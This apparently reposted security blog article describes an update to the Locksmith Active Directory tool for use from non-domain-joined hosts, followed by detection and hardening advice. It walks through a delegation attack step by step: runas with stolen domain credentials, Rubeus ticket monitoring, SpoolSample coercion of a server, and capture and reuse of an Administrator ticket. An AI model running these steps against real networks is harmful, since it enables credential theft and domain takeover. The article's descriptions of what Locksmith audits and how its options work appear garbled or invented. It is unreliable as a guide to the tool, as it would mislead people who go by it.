Listen to this Post

Introduction:
The lines between internal and external network perimeters continue to blur as offensive security tools evolve to bypass traditional authentication barriers. Jake Hildreth’s Locksmith, a powerful tool for auditing Active Directory (AD) trust relationships and identifying misconfigurations in kerberos delegation, has recently been updated to support reconnaissance from non-domain-joined systems. This update fundamentally shifts the threat landscape, allowing penetration testers and, unfortunately, malicious actors to map critical attack paths without ever enrolling a device into the target domain, drastically reducing their forensic footprint.
Learning Objectives:
- Understand how to execute Active Directory recon and attack tooling from unauthenticated, non-domain-joined Windows hosts.
- Master the use of the `runas` command and the new `-server` flag in Locksmith to pivot into AD assessments remotely.
- Learn to identify and exploit dangerous kerberos delegation misconfigurations (Unconstrained, Constrained, Resource-Based) from an external vantage point.
- Differentiate between traditional domain-joined attacks and modern “no-join” methodologies.
You Should Know:
- Setting Up the Offensive Environment on a Non-Domain-Joined Host
Before launching any attacks, you must prepare your workstation. Since the machine is not part of the domain, you lack the automatic Kerberos tickets and trust relationships that a domain-joined box would possess. However, as long as you have valid domain credentials (usernames and passwords), you can still operate.
First, ensure PowerShell execution policy allows you to run scripts. Open PowerShell as Administrator (using a local administrator account on your attack machine) and execute:
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
Next, clone or download the latest version of Locksmith. Navigate to the directory containing the `.ps1` files. Unlike previous versions that required intimate domain context, this update is designed for flexibility.
Import-Module .\Locksmith.psd1 -Verbose
If you encounter errors regarding module loading, you may need to unblock the files:
Get-ChildItem -Path . -Recurse | Unblock-File
- Using the New -Server Flag for Remote Targeting
The most significant update is the introduction of the `-server` flag. Historically, tools like this would attempt to discover domain controllers via the local machine’s network settings. If the machine isn’t joined, this discovery fails. Now, you can directly point the tool at your target root domain controller.
To execute a basic scan against a target domain controller (e.g., DC01.targetdomain.com), you will use the `runas` command to generate a network logon session with your stolen or acquired domain credentials.
runas /netonly /user:targetdomain.com\validuser powershell.exe
This opens a new PowerShell window where all network traffic will authenticate using the provided domain credentials, even though the local machine remains non-domain-joined.
Inside this new PowerShell window, run the Locksmith audit:
Invoke-Locksmith -Server DC01.targetdomain.com
This command will scan for dangerous delegations across the domain by querying the specified Domain Controller directly. It bypasses the need for the local machine’s DNS to resolve the domain properly, relying on the manual target.
3. Analyzing Delegation Misconfigurations from the Outside
Locksmith identifies three primary types of Kerberos delegation issues: Unconstrained, Constrained, and Resource-Based Constrained Delegation (RBCD). Once the scan completes, review the output for entries marked as `High` severity.
For example, if you find a computer account with Unconstrained Delegation enabled, you can proceed with an attack to coerce that server into authenticating to you, capturing its tickets. While Locksmith identifies the target, tools like Rubeus or SpoolSample are used for exploitation.
Assuming Locksmith identified a target server called 'FILESRV01' On your non-domain-joined machine, you would run: (Within the same runas session) .\Rubeus.exe monitor /interval:5 /filteruser:FILESRV01$ /targetuser:[email protected]
In a separate window, you would coerce the authentication:
.\SpoolSample.exe FILESRV01.domain.com YourAttackMachine.domain.com
The ticket for the `Administrator` account relayed from the compromised server will be captured by Rubeus, allowing you to pass the ticket and gain access.
4. Executing Linux-Based Attacks via PowerShell Core
Penetration testers often prefer Linux. With the update to Locksmith, you can now perform these attacks from a Linux machine using PowerShell Core (pwsh). This is particularly useful for evading defenses that monitor native Windows processes.
First, install PowerShell Core on your Linux distribution (Kali, Ubuntu, etc.):
sudo apt-get update sudo apt-get install -y powershell
Then, import the module and use the same `-server` flag. You must still use `runas` equivalent authentication concepts, which in PowerShell Core on Linux translates to using `-Credential` with PSCredential objects, though the simplest method remains passing the `/netonly` style context via environment variables or by ensuring you run `pwsh` with Kerberos configured.
From within pwsh on Kali
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('targetdomain.com\validuser', $SecPassword)
Invoke-Locksmith -Server DC01.targetdomain.com -Credential $Cred
This allows cross-platform AD auditing without ever joining the domain.
5. Mitigation and Hunting for This Technique
Defenders must understand how to detect these attacks. Since the attacking machine is not domain-joined, traditional “Anomalous Logon” detections based on workstation names may fail. Focus on Event ID 4624 (Logon Type 3 – Network) originating from IP addresses outside your normal DHCP scope but using valid domain credentials. Specifically, look for logons where the “Workstation Name” field is blank or inconsistent with the IP origin.
To harden your environment against the delegation attacks Locksmith finds, immediately review accounts flagged with “Delegation” privileges. Disable Unconstrained Delegation wherever possible.
On a Domain Controller, find accounts with Unconstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, ServicePrincipalName
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, ServicePrincipalName
Convert these accounts to Constrained Delegation with specific service types only, or better yet, move to Resource-Based Constrained Delegation which gives the resource owner control.
What Undercode Say:
- Key Takeaway 1: The `-server` flag in Locksmith eliminates the prerequisite of domain-joining, lowering the barrier for entry and allowing attackers to perform deep AD reconnaissance with nothing more than a set of credentials and network line-of-sight to a Domain Controller.
- Key Takeaway 2: This update reinforces the principle that “inside the network” is not the same as “inside the domain.” Security controls must be applied at the network authentication level (NTLM/Kerberos) regardless of the requesting device’s domain membership status.
The evolution of tools like Locksmith represents a critical shift in red team operations, moving away from noisy, agent-based implants to quieter, native API calls executed from unmanaged devices. Defenders can no longer rely on endpoint detection and response (EDR) on the attacking machine, as the attacker’s device is outside their control. This forces security teams to focus heavily on North-South traffic inspection, authentication throttling, and strict conditional access policies for domain controllers, treating every authentication request as potentially hostile, regardless of its origin.
Prediction:
As tooling continues to adapt to “non-domain-joined” execution, we will see a rise in attacks targeting cloud-joined devices (Microsoft Entra ID joined) attempting to authenticate to on-premises AD. This will force a convergence of identity security strategies, pushing organizations to adopt true Zero Standing Privileges (ZSP) for all administrative access and deprecating legacy authentication protocols that enable these remote delegation attacks. The future of AD security lies not in protecting the perimeter, but in hardening the authentication fabric itself.
▶️ Related Video (88% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Daniel Scheidt – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


